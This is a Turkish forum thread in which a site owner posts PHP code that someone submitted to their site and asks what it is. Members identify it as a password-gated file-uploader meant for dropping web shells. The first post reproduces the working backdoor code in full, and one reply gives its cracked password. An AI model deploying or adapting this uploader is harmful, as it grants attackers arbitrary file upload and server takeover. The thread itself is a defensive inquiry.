• 25-10-2019, 06:45:58
    #1
    Birisi sitemde gönderi olarak paylaşmış . Bu kod nedir ?
    ( Sitemin kodlarla hiçbir alakası yok. İmzamdaki sitedir)

    <?php
    session_start();
    if($_SESSION["adm"]){
    echo '<b>Namesis<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br>'; }}
    }
    if($_POST["p"]){
    $p = $_POST["p"];
    $pa = md5($p);
    if($pa=="f6dee6ab99c48e6c77bd0817628c3f71"){
    $_SESSION["adm"] = 1;
    }
    }
    ?>
    <form action="" method="post">
    <input type="text" name="p">
    </form>
  • 25-10-2019, 06:51:44
    #2
    https://www.phpr.org/php-session-oturum-yonetimi/
    • Hafizyazar
    Hafizyazar bunu beğendi.
    1 kişi bunu beğendi.
  • 25-10-2019, 06:54:39
    #3
    Bu kodu gönderi olarak paylaşan kişi ne yapmaya çalışmış onu anlamadim. Gönderi olarak kod giren biri kodlarla oturumu yönetebilir mi ki ?
  • 25-10-2019, 07:07:07
    #4
    bir seyler denemek istemis ama olmaz sanirim daha mantikli yollari var
    not: parolaniz "duman" sa degistirin
  • 25-10-2019, 07:12:10
    #5
    asiminnesli adlı üyeden alıntı: mesajı görüntüle
    bir seyler denemek istemis ama olmaz sanirim daha mantikli yollari var
    not: parolaniz "duman" sa degistirin
    Bilgi için teşekkür ediyorum hocam. Yok hayır duman değil parolam.md5 çözme kısmından bende baktım ona . Büyük ihtimalle kendi parolası
  • 25-10-2019, 07:59:49
    #6
    Üyeliği durduruldu
    Basit bir upload kodu bu. Bu upload formunu kullanarak web shell dediğimiz yazılımlardan upload etmeye çalışacaklar.
  • 25-10-2019, 08:16:25
    #7
    Eskiden bu tarz kodları siteye hangi yolla girerseniz girin işe yaradı php bunu yıllar önce kapadı ama arkadaşın haberi yok deneme yapıyor.
  • 25-10-2019, 13:22:46
    #8
    awoken adlı üyeden alıntı: mesajı görüntüle
    Basit bir upload kodu bu. Bu upload formunu kullanarak web shell dediğimiz yazılımlardan upload etmeye çalışacaklar.
    Basarabilir mi bu kodla ?
    delikanli53 adlı üyeden alıntı: mesajı görüntüle
    Eskiden bu tarz kodları siteye hangi yolla girerseniz girin işe yaradı php bunu yıllar önce kapadı ama arkadaşın haberi yok deneme yapıyor.
    Amatör hackerle karşı karşıyayız desenize 😄
  • 25-10-2019, 13:30:13
    #9
    Acemi birisi..